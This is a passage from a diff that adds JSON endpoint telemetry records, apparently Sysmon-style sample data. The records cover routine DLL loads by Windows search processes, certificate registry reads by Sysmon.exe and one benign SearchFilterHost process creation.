"C:\\Windows\\System32\\gdi32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + 
"event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "SearchProtocolHost.exe", + "image_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570915590000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": 
"Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570915740000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": 
"C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\SearchFilterHost.exe\" 0 744 748 756 8192 752 ", + "event_type": "process", + "logon_id": 999, + "parent_process_name": 
"SearchIndexer.exe", + "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", + "pid": 6608, + "ppid": 5824, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "subtype": "create", + "timestamp": 131883570916229984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}", + "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6608, + 
"process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": 
"C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": 
"gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
